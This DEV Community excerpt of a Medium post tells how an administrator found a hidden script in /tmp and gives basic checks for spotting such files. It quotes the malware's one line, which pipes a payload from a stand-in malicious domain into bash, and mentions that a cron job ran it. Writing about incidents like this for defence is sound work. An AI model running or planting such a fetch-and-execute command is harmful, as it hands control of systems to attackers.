DEV Community

Faruk
Faruk

Posted on • Originally published at Medium

How I Caught a Suspicious Shell Script Running in /tmp (And What It Taught Me) | by Faruk Ahmed | May, 2025

Member-only story

How I Caught a Suspicious Shell Script Running in /tmp (And What It Taught Me)

--

Share

✍️ Full Blog Content:

Intro:

Not all attacks are loud. Some just hide in quiet corners of your filesystem — like /tmp. I once found a tiny shell script there doing something it shouldn't. No alerts were triggered. No services crashed. But it could have become a serious problem if I hadn’t checked when I did. Here’s how I found it, what it was doing, and how you can avoid making the same mistake.

What I Saw:

While checking disk usage, I noticed this:

du -sh /tmp/*
Enter fullscreen mode Exit fullscreen mode

One folder in /tmp was ~80MB — more than usual. Inside, I found this:

/tmp/.cache/.xsh
Enter fullscreen mode Exit fullscreen mode

When I opened it:

cat /tmp/.cache/.xsh
Enter fullscreen mode Exit fullscreen mode

I saw:

#!/bin/bashcurl http://malicious-domain.com/payload.sh | bash
Enter fullscreen mode Exit fullscreen mode

The script was designed to fetch a remote payload every 6 hours using a background cron job added under a non-root service user.

What I Learned:

✅ 1. Never Ignore Hidden Files in /tmp Run:

find /tmp -type f -name ".*"
Enter fullscreen mode Exit fullscreen mode

👉 Read Full Blog on Medium Here

Image of Timescale

Timescale – the developer's data platform for modern apps, built on PostgreSQL

Timescale Cloud is PostgreSQL optimized for speed, scale, and performance. Over 3 million IoT, AI, crypto, and dev tool apps are powered by Timescale. Try it free today! No credit card required.

Try free

Top comments (0)

👋 Kindness is contagious

Show your support for this compelling post and become part of the vibrant DEV Community. All levels of coders can share insights and build collective wisdom.

Even a brief “thank you” can brighten an author’s day. Drop your kudos below!

At DEV, sharing know-how paves the way and strengthens connections. If this article resonated with you, a quick note of thanks goes a long way.

Count me in!